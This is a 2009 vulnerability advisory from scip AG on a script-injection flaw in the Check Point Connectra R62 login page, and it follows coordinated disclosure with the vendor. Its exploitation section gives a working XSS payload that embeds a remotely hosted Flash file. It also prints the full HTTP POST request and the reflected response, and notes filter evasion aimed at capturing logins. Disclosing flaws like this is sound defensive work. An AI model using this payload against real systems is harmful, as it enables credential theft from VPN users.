Check Point Connectra Script Injection

`Check Point Connectra R62 Login Script Injection Vulnerability  
scip AG Vulnerability ID 4020 (09/04/2009)  
http://www.scip.ch/?vuldb.4020  
  
I. INTRODUCTION  
  
Check Point Connectra is a so-called SSL-VPN solution, which allows  
users to access a remote system using a regular web browser.  
  
More information is available on the official product web site at the  
following URL[1]:  
  
http://www.checkpoint.com/products/connectra/index.html  
  
II. DESCRIPTION  
  
Stefan Friedli at scip AG (Switzerland) found an input validation error  
within the current release, which enabled an attacker to perform various  
web-based attacks.  
  
The initial logon script at /Login/Login, that is being used for  
unauthenticated users to log in, fails to perform proper input  
validation on the data that is being submitted via HTTP POST. While  
certain fields are escaped before being sent back to users browser, the  
parameter "vpid_prefix" lacks any validation and is therefore vulnerable  
to script injection.  
Other parts of the application might be affected too.  
  
This vulnerability has been tested on version R62, other versions might  
be affected as well.  
  
III. EXPLOITATION  
  
Classic script injection techniques and unexpected input data within a  
browser session can be used to exploit these vulnerabilities. The target  
application does actually check for certain patterns and prevents an  
attacker from using easy exploiting strings containing substrings like  
"script", "javascript", "alert" or similar. However, we consider this to  
be an imperfect mechanism that is unable to prevent an attack using a  
more sophisticated payload. For a selection, you might want to check  
RSnakes popular XSS Cheat Sheet[2], which contains several patterns not  
being detected by the filter in place, allowing you execute any  
arbitrary, externally hosted payload.  
  
We exploited the vulnerability for a customer in order to proof the  
possibility to capture usernames and passwords. One of the possibilities  
mentioned above is, to embed a remote flash file and grant it the  
permission to execute script code.   
  
Vulnerable Variable Value:  
  
vpid_prefix = "><embed/src="http://www.scip.ch/p/s/w/ccs.swf"   
allowScriptAccess=always><a name="  
  
--- CUT ---  
POST https://TARGET:443/Login/Login HTTP/1.1  
Host: TARGET  
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2)  
Gecko/20090729 Firefox/3.5.2  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 300  
Connection: keep-alive  
Referer: https://TARGET/Login/Login?LangCode=  
Cookie: CheckCookieSupport=1; ICSCookie=***purged***; user_locale=en_US  
Content-Type: application/x-www-form-urlencoded  
Content-length: 153  
  
loginType=Standard&userName=&vpid_prefix="><embed/src="http://www.scip.c  
h/p/s/w/ccs.swf"   
allowScriptAccess=always><a name="  
&password=&HeightData=1147&Login=Sign+In  
  
--- CUT END ---  
  
Response Snippet:  
  
--- CUT ---  
<input type="hidden" id="vpid_prefix" name="vpid_prefix"  
value=""><embed/src="http://www.scip.ch/p/s/w/ccs.swf"  
allowScriptAccess=always><a name="">  
--- CUT END ---  
  
IV. IMPACT  
  
Because non-authenticated parts of the software are affected, this  
vulnerability is serious for every secure environment. Non-authenticated  
users might be able to exploit this flaw to gain elevated privileges in  
the target environment (e.g. extracting sensitive cookie information or  
login information) or to perform any other form of web-based attacks.  
Due to the fact that the application will often be allowed to make use  
of ActiveX, it can also be used as a springboard to inject other  
payloads, for example MS09-037[3] or any other vulnerability disclosed  
lately, that might be exploited using a web browser.  
  
Because other parts of the application might be affected too - this  
could include some second order vulnerabilities - a severe attack  
scenario might be possible.  
  
V. DETECTION  
  
Detection of web based attacks requires a specialized web proxy and/or  
intrusion detection system. Patterns for such a detection are available  
and easy to implement. Usually the mathematical or logical symbols for  
less-than (<) and greater-than (>) are required to propose a HTML tag.  
In some cases single (') or double quotes (") are required to inject the  
code in a given HTML statement. Some implementation of security systems  
are looking for well-known attack tags as like <script> and attack  
attributes onMouseOver too. However, these are usually not capable of  
identifying highly optimized payload.  
  
VI. SOLUTION  
  
Check Point provides a hotfix for the vulnerability which should be  
installed on vulnerable systems  
  
VII. VENDOR RESPONSE  
  
Check Point acknowledged the problem and provides a hotfix for the  
vulnerability.  
Detailed information on the issue, maintained by Check Point, can be  
found at:  
https://supportcenter.checkpoint.com/supportcenter/portal?solutionid=sk4  
2793  
  
VIII. SOURCES  
  
scip AG - Security Consulting Information Process (german)  
http://www.scip.ch/  
  
scip AG Vulnerability Database (german)  
http://www.scip.ch/?vuldb.4020  
  
IX. DISCLOSURE TIMELINE  
  
2009/09/04 Identification of the vulnerability, Vendor is being  
notified.  
2009/09/04 Check Point confirms the receipt of the notification  
2009/09/04 scip AG confirms status and procedure  
2009/09/06 Check Point confirms the existence of the flaw, agrees on the  
proposed timeline for coordinated release and announces a hotfix  
2009/09/06 scip AG confirms status and procedure  
2009/09/16 Check Point states that the hotfix is currently in QA and  
will be ready for coordinated release within the next week  
2009/09/21 Check Point is ready to release the hotfix and a public  
vendor response  
2009/09/21 scip AG confirms and coordinates public release of  
advisory/vendor response/hotfix  
  
X. CREDITS  
  
The vulnerabilities were discovered by Stefan Friedli.  
  
Stefan Friedli, scip AG, Zuerich, Switzerland  
stfr-at-scip.ch  
http://www.scip.ch/  
  
A1. BIBLIOGRAPHY  
  
[1] Connectra Official Vendor Information, Check Point  
http://www.checkpoint.com/products/connectra/index.html  
  
[2] XSS Cheat Sheet, RSnake  
http://ha.ckers.org/xss.html  
  
[3] Microsoft Security Bulletin MS09-037 - Critical, Microsoft  
http://www.microsoft.com/technet/security/bulletin/MS09-037.mspx  
  
[4] Check Point Vendor-Response on this issue  
https://supportcenter.checkpoint.com/supportcenter/LoginRedirect.jsp?toU  
RL=eventSubmit_doGoviewsolutiondetails=%26solutionid=sk42793  
  
A2. LEGAL NOTICES  
  
Copyright (c) 2002-2009 scip AG, Switzerland.  
  
Permission is granted for the re-distribution of this alert. It may not  
be edited in any way without permission of scip AG.  
  
The information in the advisory is believed to be accurate at the time  
of publishing based on currently available information. There are no  
warranties with regard to this information. Neither the author nor the  
publisher accepts any liability for any direct, indirect or  
consequential loss or damage from use of or reliance on this advisory.  
`